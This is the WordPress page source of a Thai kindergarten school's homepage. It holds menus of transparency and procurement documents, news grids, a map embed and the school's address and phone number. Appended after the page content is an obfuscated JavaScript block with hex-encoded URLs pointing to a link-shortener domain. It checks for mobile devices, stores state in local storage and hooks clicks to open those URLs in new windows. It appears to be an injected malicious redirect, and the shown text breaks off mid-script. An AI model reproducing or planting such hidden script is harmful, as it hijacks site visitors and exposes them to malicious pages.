style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#eee9da\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const 